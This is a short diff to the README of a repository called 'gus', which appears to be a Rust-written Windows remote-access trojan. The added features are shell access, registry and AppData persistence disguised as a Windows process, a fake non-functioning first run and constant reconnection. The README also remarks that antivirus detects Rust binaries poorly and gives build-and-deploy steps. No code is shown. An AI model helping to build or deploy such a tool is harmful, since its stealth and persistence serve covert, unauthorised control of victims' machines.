JohnSwiftC/gus/README.md

 Small bonus, AV is horrible at detecting Rust binaries.

+# Features

+- Drop into PowerShell, CMD, or any other shell application.
+- Maintain persistence disguised as a Windows process in the registry and AppData.
+- Appears to not function upon first run.
+- Always seeks a connection while the machine is on.

 # Usage

 Clone repo, look at main.rs and set your configuration settings, run `cargo build --release`, deploy.